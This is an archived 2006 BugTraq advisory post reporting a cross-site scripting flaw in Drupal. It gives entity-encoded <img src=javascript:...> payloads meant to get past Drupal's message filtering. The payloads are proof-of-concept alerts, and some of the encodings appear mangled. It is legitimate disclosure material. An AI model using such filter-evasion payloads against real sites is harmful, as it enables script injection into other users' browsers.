BugTraq
Drupal all versiyon xss cehennem.org Jan 02 2006 10:45AM
liz0 bsdmail com (1 replies)
Drupal all versiyon xss
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

------------------------------------------------------------------------
------------------------------------------------------------------------
---------------------

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:ale
14t('XSS')>
------------------------------------------------------------------------
------------------------------------------------------------------------
---------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:al&#x
65rt('XSS')>

------------------------------------------------------------------------
------------------------------------------------------------------------
---------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:ale
14t('XSS')> Vulnerable

post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:al&#x
65rt('XSS')> Vulnerable

---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 (at) bsdmail (dot) com [email concealed]
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyb
erlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------

[ reply ]
Re: Drupal all versiyon xss cehennem.org Jan 03 2006 08:38PM
RSnake (rsnake shocking com)


 

Privacy Statement
Copyright 2010, SecurityFocus